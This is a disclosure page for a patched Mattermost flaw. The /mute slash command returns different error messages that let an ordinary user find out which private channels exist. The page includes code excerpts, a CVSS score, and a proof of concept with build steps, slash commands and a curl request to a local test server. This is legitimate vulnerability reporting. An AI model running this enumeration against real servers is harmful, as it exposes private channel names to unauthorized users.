winfunc
Back to Hacktivity

Status: Patched

This vulnerability has been verified as resolved and deployed.

Mattermost logo
MattermostCVE-2026-213862026

Private Channel Enumeration via /mute Slash Command (CVE-2026-21386)

Summary

The /mute slash command returned different error messages for nonexistent channels versus private channels the user was not a member of, allowing authenticated users to enumerate private channels

The MuteProvider.DoCommand handler allows a user to specify ~channel-handle to toggle the mute state of any channel. Instead of using an authorization-aware helper, it directly calls Store().Channel().GetByName() which returns private channel metadata without verifying membership. The command then returns two different localized errors: api.command_mute.error when a channel truly does not exist, and api.command_mute.not_member.error when ToggleMuteChannel fails because the caller is not a member. This lets any authenticated team member probe arbitrary handles (/mute ~secret-ops) to distinguish nonexistent channels from private channels they are not authorized to know about, leaking channel existence and names.

CVSS Score

VectorN
ComplexityL
PrivilegesL
User InteractionN
ScopeU
ConfidentialityL
IntegrityN
AvailabilityN
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Vulnerability Location

SourceLine 48
server/channels/app/slashcommands/command_mute.go
(*MuteProvider).DoCommand
SinkLine 65
server/channels/app/slashcommands/command_mute.go
(*MuteProvider).DoCommand

Sink-to-Source Analysis

1
server/channels/app/slashcommands/command_mute.go:58

User-supplied channelName is looked up via the raw store, which returns private channels without membership checks.

GO
channel, _ = a.Srv().Store().Channel().GetByName(channel.TeamId, channelName, true)
2
server/channels/app/slashcommands/command_mute.go:60

Nonexistent channels return a distinct error message.

GO
if channel == nil { return ... api.command_mute.error }
3
server/channels/app/slashcommands/command_mute.go:65

When the channel exists but user is not a member, a different error string is returned, enabling enumeration.

GO
channelMember, err := a.ToggleMuteChannel(...); if err != nil { return ... api.command_mute.not_member.error }

Impact Analysis

Critical Impact

Attackers can enumerate all private channel names within a team, revealing sensitive project or incident names that should be hidden. While no content is exposed, the information leakage can facilitate targeted social engineering and reconnaissance. The attack is low complexity and can be automated with no throttling.

Attack Surface

Any authenticated user in a team can issue slash commands. The /mute command with ~channelname arguments is the attack vector.

Preconditions

Attacker must be an authenticated user in the team but does not need any special role. Only requires knowledge of the team ID and membership in some channel to run slash commands.

Proof of Concept

Environment Setup

Requirements: Ubuntu 22.04 or macOS 14.

Install dependencies:

BASH
sudo apt update && sudo apt install -y make git go curl

Clone and build Mattermost:

BASH
git clone https://github.com/mattermost/mattermost.git
cd mattermost
make build-server
cd server
./bin/mattermost

Server listens on http://localhost:8065.

Target Configuration

  1. Create an admin account and a test team via the web UI.
  2. Sign in as an ordinary member ([email protected]).
  3. Ensure a private channel named secret-ops exists in the team where the user is not a member.

Exploit Delivery

Use the slash command input box:

  1. In any channel, run /mute ~secret-ops.
  2. Observe the response api.command_mute.not_member.error.
  3. Run /mute ~doesnotexist and observe api.command_mute.error.

Alternatively, using the REST API:

BASH
curl -X POST http://localhost:8065/api/v4/commands/execute \
  -H 'Authorization: Bearer <user-token>' \
  -H 'Content-Type: application/json' \
  -d '{
    "channel_id": "<current-channel-id>",
    "team_id": "<team-id>",
    "command": "/mute ~secret-ops"
  }'

Log responses:

  • api.command_mute.not_member.error → private channel exists
  • api.command_mute.error → channel absent

Outcome

Attacker enumerates names of private channels without authorization, leaking sensitive project names.

Expected Response: Different error messages for existing private channels vs. nonexistent channels allow binary enumeration.

View Patch PRVerify fix on GitHub